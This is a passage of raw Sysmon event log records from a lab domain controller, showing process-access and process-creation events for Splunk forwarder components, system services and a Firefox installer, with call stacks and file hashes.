Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014030Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:48.021{59A5CD1D-9454-6005-2805-00000000A301}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014059Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:49.739{59A5CD1D-940F-6005-0C05-00000000A301}64766580C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+141977|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+32707|C:\Windows\SYSTEM32\IEFRAME.dll+12e23a|C:\Windows\SYSTEM32\IEFRAME.dll+125302|C:\Windows\SYSTEM32\IEFRAME.dll+124d40|C:\Windows\SYSTEM32\IEFRAME.dll+3f8de|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014058Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:49.739{59A5CD1D-940F-6005-0C05-00000000A301}64766580C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1418e2|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+32707|C:\Windows\SYSTEM32\IEFRAME.dll+12e23a|C:\Windows\SYSTEM32\IEFRAME.dll+125302|C:\Windows\SYSTEM32\IEFRAME.dll+124d40|C:\Windows\SYSTEM32\IEFRAME.dll+3f8de|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014057Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:49.739{59A5CD1D-940F-6005-0C05-00000000A301}64766580C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1418c7|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+32707|C:\Windows\SYSTEM32\IEFRAME.dll+12e23a|C:\Windows\SYSTEM32\IEFRAME.dll+125302|C:\Windows\SYSTEM32\IEFRAME.dll+124d40|C:\Windows\SYSTEM32\IEFRAME.dll+3f8de|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014056Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:49.739{59A5CD1D-940F-6005-0C05-00000000A301}64766580C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1418c7|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+32707|C:\Windows\SYSTEM32\IEFRAME.dll+12e23a|C:\Windows\SYSTEM32\IEFRAME.dll+125302|C:\Windows\SYSTEM32\IEFRAME.dll+124d40|C:\Windows\SYSTEM32\IEFRAME.dll+3f8de|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014055Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:49.739{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9455-6005-2A05-00000000A301}3180C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014054Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:49.739{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014053Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:49.739{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014052Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:49.739{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014051Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:49.739{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014050Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:49.739{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9455-6005-2A05-00000000A301}3180C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014049Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:49.739{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9455-6005-2A05-00000000A301}3180C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014048Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:49.740{59A5CD1D-9455-6005-2A05-00000000A301}3180C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014069Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:51.974{59A5CD1D-8E46-6005-1600-00000000A301}15444140C:\Windows\system32\svchost.exe{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014068Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:51.974{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014067Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:51.161{59A5CD1D-93F6-6005-E604-00000000A301}48886264C:\Windows\system32\csrss.exe{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014066Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:51.068{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014065Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:51.068{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014064Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:51.068{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014063Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:51.068{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014062Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:51.068{59A5CD1D-9451-6005-2405-00000000A301}63165224C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exe{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+159f0b(wow64)|C:\Windows\System32\KERNELBASE.dll+159bbc(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exe+18fd0|C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exe+1a0da|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 154100x800000000000000014061Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:51.068{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe84.0.2Firefox InstallerFirefoxMozilla Corporationsetup.exe.\setup.exe /LaunchedFromStub /INI=C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\config.iniC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=20B068D18C0C4B44221EAA28AFCB6B67,SHA256=12C2803AE3BB8A48FC423DB5F0F06414E7705C67B5F2AE50C2CBFAF2D55E92CC,IMPHASH=E2A592076B17EF8BFB48B7E03965A3FC{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exe"C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exe" /LaunchedFromStub /INI=C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\config.ini 10341000x800000000000000014060Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:51.068{59A5CD1D-8E46-6005-1200-00000000A301}12124900C:\Windows\System32\svchost.exe{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac06|c:\windows\system32\pcasvc.dll+aa66|c:\windows\system32\pcasvc.dll+aa28|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016171Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.974{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016170Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.974{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016169Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.974{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016168Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.974{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016167Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 